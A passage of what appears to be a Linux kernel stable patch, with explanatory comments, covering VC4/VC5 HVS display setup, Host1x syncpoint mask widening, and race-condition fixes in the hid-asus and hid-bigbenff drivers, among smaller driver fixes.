+ 			vc4_hvs_mask_underrun(hvs, channel);
+ 			vc4_hvs_report_underrun(dev);
+ 
+@@ -776,7 +783,7 @@ static int vc4_hvs_bind(struct device *dev, struct device *master, void *data)
+ 	struct vc4_hvs *hvs = NULL;
+ 	int ret;
+ 	u32 dispctrl;
+-	u32 reg;
++	u32 reg, top;
+ 
+ 	hvs = drmm_kzalloc(drm, sizeof(*hvs), GFP_KERNEL);
+ 	if (!hvs)
+@@ -896,22 +903,102 @@ static int vc4_hvs_bind(struct device *dev, struct device *master, void *data)
+ 		    SCALER_DISPCTRL_DISPEIRQ(1) |
+ 		    SCALER_DISPCTRL_DISPEIRQ(2);
+ 
+-	dispctrl &= ~(SCALER_DISPCTRL_DMAEIRQ |
+-		      SCALER_DISPCTRL_SLVWREIRQ |
+-		      SCALER_DISPCTRL_SLVRDEIRQ |
+-		      SCALER_DISPCTRL_DSPEIEOF(0) |
+-		      SCALER_DISPCTRL_DSPEIEOF(1) |
+-		      SCALER_DISPCTRL_DSPEIEOF(2) |
+-		      SCALER_DISPCTRL_DSPEIEOLN(0) |
+-		      SCALER_DISPCTRL_DSPEIEOLN(1) |
+-		      SCALER_DISPCTRL_DSPEIEOLN(2) |
+-		      SCALER_DISPCTRL_DSPEISLUR(0) |
+-		      SCALER_DISPCTRL_DSPEISLUR(1) |
+-		      SCALER_DISPCTRL_DSPEISLUR(2) |
+-		      SCALER_DISPCTRL_SCLEIRQ);
++	if (!vc4->is_vc5)
++		dispctrl &= ~(SCALER_DISPCTRL_DMAEIRQ |
++			      SCALER_DISPCTRL_SLVWREIRQ |
++			      SCALER_DISPCTRL_SLVRDEIRQ |
++			      SCALER_DISPCTRL_DSPEIEOF(0) |
++			      SCALER_DISPCTRL_DSPEIEOF(1) |
++			      SCALER_DISPCTRL_DSPEIEOF(2) |
++			      SCALER_DISPCTRL_DSPEIEOLN(0) |
++			      SCALER_DISPCTRL_DSPEIEOLN(1) |
++			      SCALER_DISPCTRL_DSPEIEOLN(2) |
++			      SCALER_DISPCTRL_DSPEISLUR(0) |
++			      SCALER_DISPCTRL_DSPEISLUR(1) |
++			      SCALER_DISPCTRL_DSPEISLUR(2) |
++			      SCALER_DISPCTRL_SCLEIRQ);
++	else
++		dispctrl &= ~(SCALER_DISPCTRL_DMAEIRQ |
++			      SCALER5_DISPCTRL_SLVEIRQ |
++			      SCALER5_DISPCTRL_DSPEIEOF(0) |
++			      SCALER5_DISPCTRL_DSPEIEOF(1) |
++			      SCALER5_DISPCTRL_DSPEIEOF(2) |
++			      SCALER5_DISPCTRL_DSPEIEOLN(0) |
++			      SCALER5_DISPCTRL_DSPEIEOLN(1) |
++			      SCALER5_DISPCTRL_DSPEIEOLN(2) |
++			      SCALER5_DISPCTRL_DSPEISLUR(0) |
++			      SCALER5_DISPCTRL_DSPEISLUR(1) |
++			      SCALER5_DISPCTRL_DSPEISLUR(2) |
++			      SCALER_DISPCTRL_SCLEIRQ);
++
++
++	/* Set AXI panic mode.
++	 * VC4 panics when < 2 lines in the FIFO.
++	 * VC5 panics when < 1 line in the FIFO.
++	 */
++	dispctrl &= ~(SCALER_DISPCTRL_PANIC0_MASK |
++		      SCALER_DISPCTRL_PANIC1_MASK |
++		      SCALER_DISPCTRL_PANIC2_MASK);
++	dispctrl |= VC4_SET_FIELD(2, SCALER_DISPCTRL_PANIC0);
++	dispctrl |= VC4_SET_FIELD(2, SCALER_DISPCTRL_PANIC1);
++	dispctrl |= VC4_SET_FIELD(2, SCALER_DISPCTRL_PANIC2);
+ 
+ 	HVS_WRITE(SCALER_DISPCTRL, dispctrl);
+ 
++	/* Recompute Composite Output Buffer (COB) allocations for the displays
++	 */
++	if (!vc4->is_vc5) {
++		/* The COB is 20736 pixels, or just over 10 lines at 2048 wide.
++		 * The bottom 2048 pixels are full 32bpp RGBA (intended for the
++		 * TXP composing RGBA to memory), whilst the remainder are only
++		 * 24bpp RGB.
++		 *
++		 * Assign 3 lines to channels 1 & 2, and just over 4 lines to
++		 * channel 0.
++		 */
++		#define VC4_COB_SIZE		20736
++		#define VC4_COB_LINE_WIDTH	2048
++		#define VC4_COB_NUM_LINES	3
++		reg = 0;
++		top = VC4_COB_LINE_WIDTH * VC4_COB_NUM_LINES;
++		reg |= (top - 1) << 16;
++		HVS_WRITE(SCALER_DISPBASE2, reg);
++		reg = top;
++		top += VC4_COB_LINE_WIDTH * VC4_COB_NUM_LINES;
++		reg |= (top - 1) << 16;
++		HVS_WRITE(SCALER_DISPBASE1, reg);
++		reg = top;
++		top = VC4_COB_SIZE;
++		reg |= (top - 1) << 16;
++		HVS_WRITE(SCALER_DISPBASE0, reg);
++	} else {
++		/* The COB is 44416 pixels, or 10.8 lines at 4096 wide.
++		 * The bottom 4096 pixels are full RGBA (intended for the TXP
++		 * composing RGBA to memory), whilst the remainder are only
++		 * RGB. Addressing is always pixel wide.
++		 *
++		 * Assign 3 lines of 4096 to channels 1 & 2, and just over 4
++		 * lines to channel 0.
++		 */
++		#define VC5_COB_SIZE		44416
++		#define VC5_COB_LINE_WIDTH	4096
++		#define VC5_COB_NUM_LINES	3
++		reg = 0;
++		top = VC5_COB_LINE_WIDTH * VC5_COB_NUM_LINES;
++		reg |= top << 16;
++		HVS_WRITE(SCALER_DISPBASE2, reg);
++		top += 16;
++		reg = top;
++		top += VC5_COB_LINE_WIDTH * VC5_COB_NUM_LINES;
++		reg |= top << 16;
++		HVS_WRITE(SCALER_DISPBASE1, reg);
++		top += 16;
++		reg = top;
++		top = VC5_COB_SIZE;
++		reg |= top << 16;
++		HVS_WRITE(SCALER_DISPBASE0, reg);
++	}
++
+ 	ret = devm_request_irq(dev, platform_get_irq(pdev, 0),
+ 			       vc4_hvs_irq_handler, 0, "vc4 hvs", drm);
+ 	if (ret)
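
The VC4 branch of the COB carve-up above works out as follows; each
SCALER_DISPBASEn register packs the first pixel of the region into bits 15:0
and the last pixel into bits 31:16:

	DISPBASE2: base     0, top  6143   (3 lines x 2048 = 6144 px)
	DISPBASE1: base  6144, top 12287   (3 lines x 2048 = 6144 px)
	DISPBASE0: base 12288, top 20735   (20736 - 12288 = 8448 px,
	                                    8448 / 2048 = 4.125 lines,
	                                    the "just over 4 lines")

The VC5 branch is laid out the same way but with 4096-pixel lines, no "- 1"
on the top field, and a 16-pixel guard gap between the regions.
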
+diff --git a/drivers/gpu/drm/vc4/vc4_plane.c b/drivers/gpu/drm/vc4/vc4_plane.c
+index bd5acc4a86876..eb08020154f30 100644
+--- a/drivers/gpu/drm/vc4/vc4_plane.c
++++ b/drivers/gpu/drm/vc4/vc4_plane.c
+@@ -75,11 +75,13 @@ static const struct hvs_format {
+ 		.drm = DRM_FORMAT_ARGB1555,
+ 		.hvs = HVS_PIXEL_FORMAT_RGBA5551,
+ 		.pixel_order = HVS_PIXEL_ORDER_ABGR,
++		.pixel_order_hvs5 = HVS_PIXEL_ORDER_ARGB,
+ 	},
+ 	{
+ 		.drm = DRM_FORMAT_XRGB1555,
+ 		.hvs = HVS_PIXEL_FORMAT_RGBA5551,
+ 		.pixel_order = HVS_PIXEL_ORDER_ABGR,
++		.pixel_order_hvs5 = HVS_PIXEL_ORDER_ARGB,
+ 	},
+ 	{
+ 		.drm = DRM_FORMAT_RGB888,
+diff --git a/drivers/gpu/drm/vc4/vc4_regs.h b/drivers/gpu/drm/vc4/vc4_regs.h
+index f0290fad991de..1256f0877ff66 100644
+--- a/drivers/gpu/drm/vc4/vc4_regs.h
++++ b/drivers/gpu/drm/vc4/vc4_regs.h
+@@ -220,6 +220,12 @@
+ #define SCALER_DISPCTRL                         0x00000000
+ /* Global register for clock gating the HVS */
+ # define SCALER_DISPCTRL_ENABLE			BIT(31)
++# define SCALER_DISPCTRL_PANIC0_MASK		VC4_MASK(25, 24)
++# define SCALER_DISPCTRL_PANIC0_SHIFT		24
++# define SCALER_DISPCTRL_PANIC1_MASK		VC4_MASK(27, 26)
++# define SCALER_DISPCTRL_PANIC1_SHIFT		26
++# define SCALER_DISPCTRL_PANIC2_MASK		VC4_MASK(29, 28)
++# define SCALER_DISPCTRL_PANIC2_SHIFT		28
+ # define SCALER_DISPCTRL_DSP3_MUX_MASK		VC4_MASK(19, 18)
+ # define SCALER_DISPCTRL_DSP3_MUX_SHIFT		18
+ 
+@@ -228,15 +234,21 @@
+  * always enabled.
+  */
+ # define SCALER_DISPCTRL_DSPEISLUR(x)		BIT(13 + (x))
++# define SCALER5_DISPCTRL_DSPEISLUR(x)		BIT(9 + ((x) * 4))
+ /* Enables Display 0 end-of-line-N contribution to
+  * SCALER_DISPSTAT_IRQDISP0
+  */
+ # define SCALER_DISPCTRL_DSPEIEOLN(x)		BIT(8 + ((x) * 2))
++# define SCALER5_DISPCTRL_DSPEIEOLN(x)		BIT(8 + ((x) * 4))
+ /* Enables Display 0 EOF contribution to SCALER_DISPSTAT_IRQDISP0 */
+ # define SCALER_DISPCTRL_DSPEIEOF(x)		BIT(7 + ((x) * 2))
++# define SCALER5_DISPCTRL_DSPEIEOF(x)		BIT(7 + ((x) * 4))
+ 
+-# define SCALER_DISPCTRL_SLVRDEIRQ		BIT(6)
+-# define SCALER_DISPCTRL_SLVWREIRQ		BIT(5)
++# define SCALER5_DISPCTRL_DSPEIVST(x)		BIT(6 + ((x) * 4))
++
++# define SCALER_DISPCTRL_SLVRDEIRQ		BIT(6)	/* HVS4 only */
++# define SCALER_DISPCTRL_SLVWREIRQ		BIT(5)	/* HVS4 only */
++# define SCALER5_DISPCTRL_SLVEIRQ		BIT(5)
+ # define SCALER_DISPCTRL_DMAEIRQ		BIT(4)
+ /* Enables interrupt generation on the enabled EOF/EOLN/EISLUR
+  * bits and short frames..
+@@ -360,6 +372,7 @@
+ 
+ #define SCALER_DISPBKGND0                       0x00000044
+ # define SCALER_DISPBKGND_AUTOHS		BIT(31)
++# define SCALER5_DISPBKGND_BCK2BCK		BIT(31)
+ # define SCALER_DISPBKGND_INTERLACE		BIT(30)
+ # define SCALER_DISPBKGND_GAMMA			BIT(29)
+ # define SCALER_DISPBKGND_TESTMODE_MASK		VC4_MASK(28, 25)
+diff --git a/drivers/gpu/drm/vkms/vkms_drv.c b/drivers/gpu/drm/vkms/vkms_drv.c
+index 293dbca50c316..69346906ec813 100644
+--- a/drivers/gpu/drm/vkms/vkms_drv.c
++++ b/drivers/gpu/drm/vkms/vkms_drv.c
+@@ -57,7 +57,8 @@ static void vkms_release(struct drm_device *dev)
+ {
+ 	struct vkms_device *vkms = drm_device_to_vkms_device(dev);
+ 
+-	destroy_workqueue(vkms->output.composer_workq);
++	if (vkms->output.composer_workq)
++		destroy_workqueue(vkms->output.composer_workq);
+ }
+ 
+ static void vkms_atomic_commit_tail(struct drm_atomic_state *old_state)
+@@ -218,6 +219,7 @@ out_unregister:
+ 
+ static int __init vkms_init(void)
+ {
++	int ret;
+ 	struct vkms_config *config;
+ 
+ 	config = kmalloc(sizeof(*config), GFP_KERNEL);
+@@ -230,7 +232,11 @@ static int __init vkms_init(void)
+ 	config->writeback = enable_writeback;
+ 	config->overlay = enable_overlay;
+ 
+-	return vkms_create(config);
++	ret = vkms_create(config);
++	if (ret)
++		kfree(config);
++
++	return ret;
+ }
+ 
+ static void vkms_destroy(struct vkms_config *config)
+diff --git a/drivers/gpu/host1x/hw/hw_host1x06_uclass.h b/drivers/gpu/host1x/hw/hw_host1x06_uclass.h
+index 5f831438d19bb..50c32de452fb1 100644
+--- a/drivers/gpu/host1x/hw/hw_host1x06_uclass.h
++++ b/drivers/gpu/host1x/hw/hw_host1x06_uclass.h
+@@ -53,7 +53,7 @@ static inline u32 host1x_uclass_incr_syncpt_cond_f(u32 v)
+ 	host1x_uclass_incr_syncpt_cond_f(v)
+ static inline u32 host1x_uclass_incr_syncpt_indx_f(u32 v)
+ {
+-	return (v & 0xff) << 0;
++	return (v & 0x3ff) << 0;
+ }
+ #define HOST1X_UCLASS_INCR_SYNCPT_INDX_F(v) \
+ 	host1x_uclass_incr_syncpt_indx_f(v)
+diff --git a/drivers/gpu/host1x/hw/hw_host1x07_uclass.h b/drivers/gpu/host1x/hw/hw_host1x07_uclass.h
+index 8cd2ef087d5d0..887b878f92f79 100644
+--- a/drivers/gpu/host1x/hw/hw_host1x07_uclass.h
++++ b/drivers/gpu/host1x/hw/hw_host1x07_uclass.h
+@@ -53,7 +53,7 @@ static inline u32 host1x_uclass_incr_syncpt_cond_f(u32 v)
+ 	host1x_uclass_incr_syncpt_cond_f(v)
+ static inline u32 host1x_uclass_incr_syncpt_indx_f(u32 v)
+ {
+-	return (v & 0xff) << 0;
++	return (v & 0x3ff) << 0;
+ }
+ #define HOST1X_UCLASS_INCR_SYNCPT_INDX_F(v) \
+ 	host1x_uclass_incr_syncpt_indx_f(v)
+diff --git a/drivers/gpu/host1x/hw/hw_host1x08_uclass.h b/drivers/gpu/host1x/hw/hw_host1x08_uclass.h
+index 724cccd71aa1a..4fb1d090edae5 100644
+--- a/drivers/gpu/host1x/hw/hw_host1x08_uclass.h
++++ b/drivers/gpu/host1x/hw/hw_host1x08_uclass.h
+@@ -53,7 +53,7 @@ static inline u32 host1x_uclass_incr_syncpt_cond_f(u32 v)
+ 	host1x_uclass_incr_syncpt_cond_f(v)
+ static inline u32 host1x_uclass_incr_syncpt_indx_f(u32 v)
+ {
+-	return (v & 0xff) << 0;
++	return (v & 0x3ff) << 0;
+ }
+ #define HOST1X_UCLASS_INCR_SYNCPT_INDX_F(v) \
+ 	host1x_uclass_incr_syncpt_indx_f(v)
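
The mask widening in the three uclass headers above matters because recent
Host1x instances expose well over 256 syncpoints, and with the old 8-bit mask
any index above 255 was silently folded onto a lower syncpoint. A standalone
worked example (plain C, values illustrative):

	#include <stdio.h>

	static unsigned int indx_old(unsigned int v) { return (v & 0xff) << 0; }
	static unsigned int indx_new(unsigned int v) { return (v & 0x3ff) << 0; }

	int main(void)
	{
		/* Syncpoint 300 used to alias syncpoint 44. */
		printf("old=%u new=%u\n", indx_old(300), indx_new(300));
		/* prints: old=44 new=300 */
		return 0;
	}
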
+diff --git a/drivers/gpu/host1x/hw/syncpt_hw.c b/drivers/gpu/host1x/hw/syncpt_hw.c
+index dd39d67ccec36..8cf35b2eff3db 100644
+--- a/drivers/gpu/host1x/hw/syncpt_hw.c
++++ b/drivers/gpu/host1x/hw/syncpt_hw.c
+@@ -106,9 +106,6 @@ static void syncpt_assign_to_channel(struct host1x_syncpt *sp,
+ #if HOST1X_HW >= 6
+ 	struct host1x *host = sp->host;
+ 
+-	if (!host->hv_regs)
+-		return;
+-
+ 	host1x_sync_writel(host,
+ 			   HOST1X_SYNC_SYNCPT_CH_APP_CH(ch ? ch->id : 0xff),
+ 			   HOST1X_SYNC_SYNCPT_CH_APP(sp->id));
+diff --git a/drivers/gpu/ipu-v3/ipu-common.c b/drivers/gpu/ipu-v3/ipu-common.c
+index 118318513e2d2..c35eac1116f5f 100644
+--- a/drivers/gpu/ipu-v3/ipu-common.c
++++ b/drivers/gpu/ipu-v3/ipu-common.c
+@@ -1165,6 +1165,7 @@ static int ipu_add_client_devices(struct ipu_soc *ipu, unsigned long ipu_base)
+ 		pdev = platform_device_alloc(reg->name, id++);
+ 		if (!pdev) {
+ 			ret = -ENOMEM;
++			of_node_put(of_node);
+ 			goto err_register;
+ 		}
+ 
+diff --git a/drivers/hid/hid-asus.c b/drivers/hid/hid-asus.c
+index f99752b998f3d..d1094bb1aa429 100644
+--- a/drivers/hid/hid-asus.c
++++ b/drivers/hid/hid-asus.c
+@@ -98,6 +98,7 @@ struct asus_kbd_leds {
+ 	struct hid_device *hdev;
+ 	struct work_struct work;
+ 	unsigned int brightness;
++	spinlock_t lock;
+ 	bool removed;
+ };
+ 
+@@ -490,21 +491,42 @@ static int rog_nkey_led_init(struct hid_device *hdev)
+ 	return ret;
+ }
+ 
++static void asus_schedule_work(struct asus_kbd_leds *led)
++{
++	unsigned long flags;
++
++	spin_lock_irqsave(&led->lock, flags);
++	if (!led->removed)
++		schedule_work(&led->work);
++	spin_unlock_irqrestore(&led->lock, flags);
++}
++
+ static void asus_kbd_backlight_set(struct led_classdev *led_cdev,
+ 				   enum led_brightness brightness)
+ {
+ 	struct asus_kbd_leds *led = container_of(led_cdev, struct asus_kbd_leds,
+ 						 cdev);
++	unsigned long flags;
++
++	spin_lock_irqsave(&led->lock, flags);
+ 	led->brightness = brightness;
+-	schedule_work(&led->work);
++	spin_unlock_irqrestore(&led->lock, flags);
++
++	asus_schedule_work(led);
+ }
+ 
+ static enum led_brightness asus_kbd_backlight_get(struct led_classdev *led_cdev)
+ {
+ 	struct asus_kbd_leds *led = container_of(led_cdev, struct asus_kbd_leds,
+ 						 cdev);
++	enum led_brightness brightness;
++	unsigned long flags;
++
++	spin_lock_irqsave(&led->lock, flags);
++	brightness = led->brightness;
++	spin_unlock_irqrestore(&led->lock, flags);
+ 
+-	return led->brightness;
++	return brightness;
+ }
+ 
+ static void asus_kbd_backlight_work(struct work_struct *work)
+@@ -512,11 +534,11 @@ static void asus_kbd_backlight_work(struct work_struct *work)
+ 	struct asus_kbd_leds *led = container_of(work, struct asus_kbd_leds, work);
+ 	u8 buf[] = { FEATURE_KBD_REPORT_ID, 0xba, 0xc5, 0xc4, 0x00 };
+ 	int ret;
++	unsigned long flags;
+ 
+-	if (led->removed)
+-		return;
+-
++	spin_lock_irqsave(&led->lock, flags);
+ 	buf[4] = led->brightness;
++	spin_unlock_irqrestore(&led->lock, flags);
+ 
+ 	ret = asus_kbd_set_report(led->hdev, buf, sizeof(buf));
+ 	if (ret < 0)
+@@ -584,6 +606,7 @@ static int asus_kbd_register_leds(struct hid_device *hdev)
+ 	drvdata->kbd_backlight->cdev.brightness_set = asus_kbd_backlight_set;
+ 	drvdata->kbd_backlight->cdev.brightness_get = asus_kbd_backlight_get;
+ 	INIT_WORK(&drvdata->kbd_backlight->work, asus_kbd_backlight_work);
++	spin_lock_init(&drvdata->kbd_backlight->lock);
+ 
+ 	ret = devm_led_classdev_register(&hdev->dev, &drvdata->kbd_backlight->cdev);
+ 	if (ret < 0) {
+@@ -1119,9 +1142,13 @@ err_stop_hw:
+ static void asus_remove(struct hid_device *hdev)
+ {
+ 	struct asus_drvdata *drvdata = hid_get_drvdata(hdev);
++	unsigned long flags;
+ 
+ 	if (drvdata->kbd_backlight) {
++		spin_lock_irqsave(&drvdata->kbd_backlight->lock, flags);
+ 		drvdata->kbd_backlight->removed = true;
++		spin_unlock_irqrestore(&drvdata->kbd_backlight->lock, flags);
++
+ 		cancel_work_sync(&drvdata->kbd_backlight->work);
+ 	}
+ 
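
This hid-asus hunk and the hid-bigbenff one below apply the same teardown
discipline: the removed flag and every schedule_work() call are serialized by
one spinlock, so once remove() flips the flag no new work can be queued, and
cancel_work_sync() then drains whatever is still running. Distilled into a
sketch (struct example_leds and both functions are illustrative):

	#include <linux/spinlock.h>
	#include <linux/workqueue.h>

	struct example_leds {
		spinlock_t lock;
		struct work_struct work;
		bool removed;
	};

	static void example_schedule(struct example_leds *led)
	{
		unsigned long flags;

		spin_lock_irqsave(&led->lock, flags);
		if (!led->removed)		/* checked under the lock... */
			schedule_work(&led->work);
		spin_unlock_irqrestore(&led->lock, flags);
	}

	static void example_remove(struct example_leds *led)
	{
		unsigned long flags;

		spin_lock_irqsave(&led->lock, flags);
		led->removed = true;		/* ...that guards this store */
		spin_unlock_irqrestore(&led->lock, flags);

		cancel_work_sync(&led->work);	/* nothing can requeue now */
	}
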
+diff --git a/drivers/hid/hid-bigbenff.c b/drivers/hid/hid-bigbenff.c
+index e8b16665860d6..a02cb517b4c47 100644
+--- a/drivers/hid/hid-bigbenff.c
++++ b/drivers/hid/hid-bigbenff.c
+@@ -174,6 +174,7 @@ static __u8 pid0902_rdesc_fixed[] = {
+ struct bigben_device {
+ 	struct hid_device *hid;
+ 	struct hid_report *report;
++	spinlock_t lock;
+ 	bool removed;
+ 	u8 led_state;         /* LED1 = 1 .. LED4 = 8 */
+ 	u8 right_motor_on;    /* right motor off/on 0/1 */
+@@ -184,18 +185,39 @@ struct bigben_device {
+ 	struct work_struct worker;
+ };
+ 
++static inline void bigben_schedule_work(struct bigben_device *bigben)
++{
++	unsigned long flags;
++
++	spin_lock_irqsave(&bigben->lock, flags);
++	if (!bigben->removed)
++		schedule_work(&bigben->worker);
++	spin_unlock_irqrestore(&bigben->lock, flags);
++}
+ 
+ static void bigben_worker(struct work_struct *work)
+ {
+ 	struct bigben_device *bigben = container_of(work,
+ 		struct bigben_device, worker);
+ 	struct hid_field *report_field = bigben->report->field[0];
+-
+-	if (bigben->removed || !report_field)
++	bool do_work_led = false;
++	bool do_work_ff = false;
++	u8 *buf;
++	u32 len;
++	unsigned long flags;
++
++	buf = hid_alloc_report_buf(bigben->report, GFP_KERNEL);
++	if (!buf)
+ 		return;
+ 
++	len = hid_report_len(bigben->report);
++
++	/* LED work */
++	spin_lock_irqsave(&bigben->lock, flags);
++
+ 	if (bigben->work_led) {
+ 		bigben->work_led = false;
++		do_work_led = true;
+ 		report_field->value[0] = 0x01; /* 1 = led message */
+ 		report_field->value[1] = 0x08; /* reserved value, always 8 */
+ 		report_field->value[2] = bigben->led_state;
+@@ -204,11 +226,22 @@ static void bigben_worker(struct work_struct *work)
+ 		report_field->value[5] = 0x00; /* padding */
+ 		report_field->value[6] = 0x00; /* padding */
+ 		report_field->value[7] = 0x00; /* padding */
+-		hid_hw_request(bigben->hid, bigben->report, HID_REQ_SET_REPORT);
++		hid_output_report(bigben->report, buf);
++	}
++
++	spin_unlock_irqrestore(&bigben->lock, flags);
++
++	if (do_work_led) {
++		hid_hw_raw_request(bigben->hid, bigben->report->id, buf, len,
++				   bigben->report->type, HID_REQ_SET_REPORT);
+ 	}
+ 
++	/* FF work */
++	spin_lock_irqsave(&bigben->lock, flags);
++
+ 	if (bigben->work_ff) {
+ 		bigben->work_ff = false;
++		do_work_ff = true;
+ 		report_field->value[0] = 0x02; /* 2 = rumble effect message */
+ 		report_field->value[1] = 0x08; /* reserved value, always 8 */
+ 		report_field->value[2] = bigben->right_motor_on;
+@@ -217,8 +250,17 @@ static void bigben_worker(struct work_struct *work)
+ 		report_field->value[5] = 0x00; /* padding */
+ 		report_field->value[6] = 0x00; /* padding */
+ 		report_field->value[7] = 0x00; /* padding */
+-		hid_hw_request(bigben->hid, bigben->report, HID_REQ_SET_REPORT);
++		hid_output_report(bigben->report, buf);
++	}
++
++	spin_unlock_irqrestore(&bigben->lock, flags);
++
++	if (do_work_ff) {
++		hid_hw_raw_request(bigben->hid, bigben->report->id, buf, len,
++				   bigben->report->type, HID_REQ_SET_REPORT);
+ 	}
++
++	kfree(buf);
+ }
+ 
+ static int hid_bigben_play_effect(struct input_dev *dev, void *data,
+@@ -228,6 +270,7 @@ static int hid_bigben_play_effect(struct input_dev *dev, void *data,
+ 	struct bigben_device *bigben = hid_get_drvdata(hid);
+ 	u8 right_motor_on;
+ 	u8 left_motor_force;
++	unsigned long flags;
+ 
+ 	if (!bigben) {
+ 		hid_err(hid, "no device data\n");
+@@ -242,10 +285,13 @@ static int hid_bigben_play_effect(struct input_dev *dev, void *data,
+ 
+ 	if (right_motor_on != bigben->right_motor_on ||
+ 			left_motor_force != bigben->left_motor_force) {
++		spin_lock_irqsave(&bigben->lock, flags);
+ 		bigben->right_motor_on   = right_motor_on;
+ 		bigben->left_motor_force = left_motor_force;
+ 		bigben->work_ff = true;
+-		schedule_work(&bigben->worker);
++		spin_unlock_irqrestore(&bigben->lock, flags);
++
++		bigben_schedule_work(bigben);
+ 	}
+ 
+ 	return 0;
+@@ -259,6 +305,7 @@ static void bigben_set_led(struct led_classdev *led,
+ 	struct bigben_device *bigben = hid_get_drvdata(hid);
+ 	int n;
+ 	bool work;
++	unsigned long flags;
+ 
+ 	if (!bigben) {
+ 		hid_err(hid, "no device data\n");
+@@ -267,6 +314,7 @@ static void bigben_set_led(struct led_classdev *led,
+ 
+ 	for (n = 0; n < NUM_LEDS; n++) {
+ 		if (led == bigben->leds[n]) {
++			spin_lock_irqsave(&bigben->lock, flags);
+ 			if (value == LED_OFF) {
+ 				work = (bigben->led_state & BIT(n));
+ 				bigben->led_state &= ~BIT(n);
+@@ -274,10 +322,11 @@ static void bigben_set_led(struct led_classdev *led,
+ 				work = !(bigben->led_state & BIT(n));
+ 				bigben->led_state |= BIT(n);
+ 			}
++			spin_unlock_irqrestore(&bigben->lock, flags);
+ 
+ 			if (work) {
+ 				bigben->work_led = true;
+-				schedule_work(&bigben->worker);
++				bigben_schedule_work(bigben);
+ 			}
+ 			return;
+ 		}
+@@ -307,8 +356,12 @@ static enum led_brightness bigben_get_led(struct led_classdev *led)
+ static void bigben_remove(struct hid_device *hid)
+ {
+ 	struct bigben_device *bigben = hid_get_drvdata(hid);
++	unsigned long flags;
+ 
++	spin_lock_irqsave(&bigben->lock, flags);
+ 	bigben->removed = true;
++	spin_unlock_irqrestore(&bigben->lock, flags);
++
+ 	cancel_work_sync(&bigben->worker);
+ 	hid_hw_stop(hid);
+ }
+@@ -318,7 +371,6 @@ static int bigben_probe(struct hid_device *hid,
+ {
+ 	struct bigben_device *bigben;
+ 	struct hid_input *hidinput;
+-	struct list_head *report_list;
+ 	struct led_classdev *led;
+ 	char *name;
+ 	size_t name_sz;
+@@ -343,14 +395,12 @@ static int bigben_probe(struct hid_device *hid,
+ 		return error;
+ 	}
+ 
+-	report_list = &hid->report_enum[HID_OUTPUT_REPORT].report_list;
+-	if (list_empty(report_list)) {
++	bigben->report = hid_validate_values(hid, HID_OUTPUT_REPORT, 0, 0, 8);
++	if (!bigben->report) {
+ 		hid_err(hid, "no output report found\n");
+ 		error = -ENODEV;
+ 		goto error_hw_stop;
+ 	}
+-	bigben->report = list_entry(report_list->next,
+-		struct hid_report, list);
+ 
+ 	if (list_empty(&hid->inputs)) {
+ 		hid_err(hid, "no inputs found\n");
+@@ -362,6 +412,7 @@ static int bigben_probe(struct hid_device *hid,
+ 	set_bit(FF_RUMBLE, hidinput->input->ffbit);
+ 
+ 	INIT_WORK(&bigben->worker, bigben_worker);
++	spin_lock_init(&bigben->lock);
+ 
+ 	error = input_ff_create_memless(hidinput->input, NULL,
+ 		hid_bigben_play_effect);
+@@ -402,7 +453,7 @@ static int bigben_probe(struct hid_device *hid,
+ 	bigben->left_motor_force = 0;
+ 	bigben->work_led = true;
+ 	bigben->work_ff = true;
+-	schedule_work(&bigben->worker);
++	bigben_schedule_work(bigben);
+ 
+ 	hid_info(hid, "LED and force feedback support for BigBen gamepad\n");
+ 
+diff --git a/drivers/hid/hid-debug.c b/drivers/hid/hid-debug.c
+index e213bdde543af..e7ef1ea107c9e 100644
+--- a/drivers/hid/hid-debug.c
++++ b/drivers/hid/hid-debug.c
+@@ -975,6 +975,7 @@ static const char *keys[KEY_MAX + 1] = {
+ 	[KEY_CAMERA_ACCESS_DISABLE] = "CameraAccessDisable",
+ 	[KEY_CAMERA_ACCESS_TOGGLE] = "CameraAccessToggle",
+ 	[KEY_DICTATE] = "Dictate",
++	[KEY_MICMUTE] = "MicrophoneMute",
+ 	[KEY_BRIGHTNESS_MIN] = "BrightnessMin",
+ 	[KEY_BRIGHTNESS_MAX] = "BrightnessMax",
+ 	[KEY_BRIGHTNESS_AUTO] = "BrightnessAuto",
+diff --git a/drivers/hid/hid-ids.h b/drivers/hid/hid-ids.h
+index 9e36b4cd905ee..2235d78784b1b 100644
+--- a/drivers/hid/hid-ids.h
++++ b/drivers/hid/hid-ids.h
+@@ -1299,7 +1299,9 @@
+ #define USB_DEVICE_ID_UGEE_XPPEN_TABLET_DECO01	0x0042
+ #define USB_DEVICE_ID_UGEE_XPPEN_TABLET_DECO01_V2	0x0905
+ #define USB_DEVICE_ID_UGEE_XPPEN_TABLET_DECO_L	0x0935
++#define USB_DEVICE_ID_UGEE_XPPEN_TABLET_DECO_PRO_MW	0x0934
+ #define USB_DEVICE_ID_UGEE_XPPEN_TABLET_DECO_PRO_S	0x0909
++#define USB_DEVICE_ID_UGEE_XPPEN_TABLET_DECO_PRO_SW	0x0933
+ #define USB_DEVICE_ID_UGEE_XPPEN_TABLET_STAR06	0x0078
+ #define USB_DEVICE_ID_UGEE_TABLET_G5		0x0074
+ #define USB_DEVICE_ID_UGEE_TABLET_EX07S		0x0071
+diff --git a/drivers/hid/hid-input.c b/drivers/hid/hid-input.c
+index 77c8c49852b5c..c3c7d0abb01ad 100644
+--- a/drivers/hid/hid-input.c
++++ b/drivers/hid/hid-input.c
+@@ -378,6 +378,10 @@ static const struct hid_device_id hid_battery_quirks[] = {
+ 	  HID_BATTERY_QUIRK_IGNORE },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_UGEE, USB_DEVICE_ID_UGEE_XPPEN_TABLET_DECO_L),
+ 	  HID_BATTERY_QUIRK_AVOID_QUERY },
++	{ HID_USB_DEVICE(USB_VENDOR_ID_UGEE, USB_DEVICE_ID_UGEE_XPPEN_TABLET_DECO_PRO_MW),
++	  HID_BATTERY_QUIRK_AVOID_QUERY },
++	{ HID_USB_DEVICE(USB_VENDOR_ID_UGEE, USB_DEVICE_ID_UGEE_XPPEN_TABLET_DECO_PRO_SW),
++	  HID_BATTERY_QUIRK_AVOID_QUERY },
+ 	{ HID_I2C_DEVICE(USB_VENDOR_ID_ELAN, I2C_DEVICE_ID_HP_ENVY_X360_15),
+ 	  HID_BATTERY_QUIRK_IGNORE },
+ 	{ HID_I2C_DEVICE(USB_VENDOR_ID_ELAN, I2C_DEVICE_ID_HP_ENVY_X360_15T_DR100),
+@@ -793,6 +797,14 @@ static void hidinput_configure_usage(struct hid_input *hidinput, struct hid_fiel
+ 			break;
+ 		}
+ 
++		if ((usage->hid & 0xf0) == 0xa0) {	/* SystemControl */
